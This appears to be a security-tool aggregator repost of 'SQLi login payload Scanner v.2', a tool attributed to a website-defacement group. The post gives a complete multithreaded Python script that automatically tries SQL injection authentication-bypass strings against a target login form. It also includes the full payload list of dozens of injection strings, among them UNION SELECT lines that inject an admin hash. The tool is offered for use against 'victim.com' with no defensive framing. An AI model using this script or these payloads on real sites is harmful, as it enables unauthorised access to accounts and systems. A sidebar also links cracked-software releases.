Quantcast
Channel: Scanner – Security List Network™
Viewing all articles
Browse latest Browse all 271

SQLi login payload Scanner v.2 released.

November 24, 2015, 12:54 am
$
0
0

SQLi login payload Scanner v.2.
System requrements : WIndows 7/Vista/8.1/10, Ubuntu 14.04, Kali Linux 2.0 Black Arch Linux.

SQLi login payload Scanner v.2.

SQLi login payload Scanner v.2.

Requirements (you can install manually using pip):
+ Python 2.6 – 2.7
– cookielib
– urllib2
– urllib
– argparse
– sys
– threading
– termcolor
– cookielib

payloader.py Script:

#!/usr/bin/python 
# -*- coding: utf-8 -*-

import urllib
import urllib2
import re
import argparse
import sys
import threading
from termcolor import colored
from cookielib import CookieJar



request_headers = {
		
		"Accept-Language" : "en-US,en;q=0.5",
		"User-Agent"	  : "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
		"Accept"          : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
		"Referer"         : "http://fbi.gov",
		"Connection"      : "keep-alive" 
}



about = colored("""
-----------------------------------------
--                                     --
-- SQLi login payload Scanner. v.2     --
--                                     --
-- Camoufl4g3                          --
--                                     --
-- Azdefacers.org                      --
-- Select the option -help for help    --
-----------------------------------------
""",'green')

#--------------------------------------------------- Scan function -------------------------------------------------

print about


def PayloadScan(target,username,password,exception,payload):

	try:
		request  = urllib2.Request(target,headers=request_headers)
		cj       = CookieJar()
		opener   = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
		data     = urllib.urlencode({username:payload,password:payload})
		u        = opener.open(target, data)
		getcode  = u.getcode()
		match    = re.findall(r'{}'.format(exception),u.read())

		if(match):
				print  "%s  %s" % (payload,colored('[-]','red'))  
		else:
				print  "%s  %s" % (payload,colored('[+]','green'))
	except KeyboardInterrupt:
		print 'stopped'
		



def Main():


	parser = argparse.ArgumentParser()

	parser.add_argument('-t',
                          action = "store", #stored
                          dest   = "target",
                          #type   = "string", #int tipi
                          help = "for example: ./bruteforce.py -t victim.com")


	parser.add_argument('-uc',
                          action = "store", #stored
                          dest   = "uc",
                          #type   = "string", #int tipi
                          help = "for example: ./bruteforce.py -uc username column")



	parser.add_argument('-pc',
                          action = "store", #stored
                          dest   = "pc",
                          #type   = "string", #int tipi
                          help = "for example: ./bruteforce.py -pc password column")


	parser.add_argument('-exception',
                          action = "store", #stored
                          dest   = "exception",
                          #type   = "string", #int tipi
                          help = "for example: ./bruteforce.py -a exception word")




	args   = parser.parse_args()



	if args.target:
		print("# Creating target " + args.target)


	if args.uc:
		print("# Creating user column " + args.uc)


	if args.pc:
		print("# Creating password column " + args.pc)

	if args.exception:
		print("# Creating exception " + args.exception)	

	target   = args.target

	print '--------------------------------------------'	

	try: 
		f 		= open("payloads.txt","r")
	except IOError:
		sys.exit('File doesn\'t exist!')

	threads = []
	for line in f.readlines():
         t = threading.Thread(target = PayloadScan, args = (target,args.uc,args.pc,args.exception,line.rstrip('\n')))
         threads.append(t)
         t.start()
	

if __name__ == "__main__":
	Main()

payloads.txt Script:

'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1-- 
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Source : https://github.com/camoufl4g3

Search
Viewing all articles
Browse latest Browse all 271

Trending Articles

Scuffham Amps - S-GEAR 2.6.0 VST, AAX, STANDALONE x86 x64 (R2R NO iLok2, +NO...

November 19, 2017, 7:24 am

Practice Sheet of Right form of verbs for HSC Students

September 22, 2019, 11:40 pm

VHSE First (1st) Allotment 2025 - vhscap.kerala.gov.in

May 24, 2025, 11:58 pm

UNIVERSE LEAGUE – UNIVERSE LEAGUE – WAR (We Are Ready) – EP [iTunes Plus M4A]

January 26, 2025, 11:12 am

City Hunter Teledrama – Episode 18 – 07th May 2016

May 6, 2016, 2:05 pm

Comment on Proposed Criteria for Identifying Predatory Conferences by Luke...

July 4, 2016, 3:53 am

Bureau of Internal Revenue: Regional Offices (Directory)

January 9, 2014, 11:06 pm

Kendrick Lamar – Not Like Us (2024) [24Bit-88.2kHz] [PMEDIA] ⭐️

May 14, 2024, 7:14 pm

Inception 2010 Hindi Dual Audio 650MB BRRip 720p ESubs HEVC

December 27, 2016, 4:23 pm

East Hull MD admits sexual assaults after another victim comes forward

January 14, 2013, 12:20 am

Download: FK ft Shenky – Nakuyewa ”Prod by: Shenky”

February 16, 2017, 4:24 pm

R. v. Sargeant, 2023 ONSC 6406 (CanLII)

November 13, 2023, 9:00 pm

Rajasthan Board 10th Result 2016 Roll No wise & Name Wise

August 20, 2016, 5:13 pm

Who’s been sentenced at Northampton Magistrates’ Court

March 30, 2019, 10:00 pm

मतलबी दोस्त स्टेट्स | Matlabi Dost Status in Hindi – Selfish Friends Status

February 13, 2020, 3:12 am

Family cries out as traditional ruler allegedly abducts brother, extorts N2.5m

September 15, 2024, 1:15 am

Long-Running Conflict In Springfield (MA) Gangland Sphere Has Manzi Family &...

December 26, 2017, 3:59 pm

Wondershare Filmora X v10.1.20.16 x64

February 8, 2021, 5:34 am

Man arrested after fracas in flat

January 16, 2017, 10:10 pm

Man charged in ongoing Sexual Assault Investigation Derek Nyilas, 46, Faces...

May 27, 2019, 8:00 am
Search